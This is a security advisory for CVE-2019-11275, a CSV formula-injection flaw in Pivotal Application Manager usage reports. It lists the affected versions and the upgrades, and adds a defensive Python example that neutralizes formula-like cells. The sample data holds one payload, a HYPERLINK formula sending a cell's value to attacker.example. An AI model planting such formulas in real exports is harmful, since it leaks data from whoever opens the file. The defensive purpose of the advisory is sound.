PT-2019-12222 · Pivotal · Pivotal Application Manager

Published

2019-10-01

·

Updated

2020-10-16

·

CVE-2019-11275

CVSS v3.1

4.3

Medium

Vector AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions
Pivotal Application Manager versions 666.0.x prior to 666.0.36
Pivotal Application Manager versions 667.0.x prior to 667.0.22
Pivotal Application Manager versions 668.0.x prior to 668.0.21
Pivotal Application Manager versions 669.0.x prior to 669.0.13
Pivotal Application Manager versions 670.0.x prior to 670.0.7
Description A remote, authenticated user can create an app whose name is written unescaped into an exported usage report. When a more privileged user opens that CSV in a spreadsheet application, a name that begins with a formula character (for example =, +, - or @) is evaluated as a formula instead of being shown as text. The formula executes in the victim's spreadsheet client, not on the Pivotal Application Manager server, which is why the CVSS vector records only a limited confidentiality impact (C:L) and no integrity or availability impact; the practical effect is that the attacker can gain access to the contents of a usage report that requires higher privileges than they hold.
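The export-side hardening that closes this class of bug, as an added example that is not Pivotal's code and does not reflect the product's real report format or field names: every user-controlled field is checked for a leading formula character before it is written to the CSV, and neutralized by prefixing a single quote so the spreadsheet stores it as text. A second helper flags app names that would be interpreted as formulas, which is the check a defender would run over existing app names after upgrading. The sample apps and the report columns are constructed for this example.

```python
import csv
import io

# Leading characters that common spreadsheet applications treat as the start
# of a formula. Tab and carriage return are included because some importers
# also trigger formula parsing on them (constructed list for this example).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Force a user-controlled value to be stored as literal text.

    A leading single quote tells spreadsheet applications to treat the cell
    as text. Field separators and quotes inside the value are left for the
    csv module to quote correctly.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def build_usage_report(apps) -> str:
    """Render a usage report as CSV text with every user-controlled field
    neutralized (hypothetical report shape: app_name, org, instances)."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["app_name", "org", "instances"])
    for name, org, instances in apps:
        writer.writerow([neutralize_cell(name), neutralize_cell(org), instances])
    return buf.getvalue()


def parse_report(text: str):
    """Read the CSV back into rows, as a spreadsheet import would."""
    return list(csv.reader(io.StringIO(text)))


def flag_risky_app_names(apps):
    """Return the app names that would be interpreted as formulas if they were
    exported without neutralization (the check to run over existing apps)."""
    return [name for name, _org, _instances in apps if is_formula_like(name)]


# Constructed sample input: one ordinary app, one whose name carries a
# HYPERLINK formula that would leak the neighbouring cell's value on click,
# and one that merely starts with a sign character.
SAMPLE_APPS = [
    ("billing-api", "finance", 3),
    ('=HYPERLINK("http://attacker.example/?"&A1,"click")', "finance", 1),
    ("+1234", "ops", 2),
]

if __name__ == "__main__":
    print("risky names:", flag_risky_app_names(SAMPLE_APPS))
    print(build_usage_report(SAMPLE_APPS))
```

The single quote remains visible in some CSV importers, so a minimal variant is to apply it only to values that actually start with a trigger character, as above, rather than to every field. Neutralization belongs at export time in the server-side code that produces the report; validating names at app-creation time is a useful second layer but does not protect reports that already contain malicious names.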
Recommendations
For versions 666.0.x prior to 666.0.36, update to version 666.0.36 or later.
For versions 667.0.x prior to 667.0.22, update to version 667.0.22 or later.
For versions 668.0.x prior to 668.0.21, update to version 668.0.21 or later.
For versions 669.0.x prior to 669.0.13, update to version 669.0.13 or later.
For versions 670.0.x prior to 670.0.7, update to version 670.0.7 or later.

Fix

Special Elements Injection

RCE


Weakness Enumeration

Related Identifiers

CVE-2019-11275

Affected Products

Pivotal Application Manager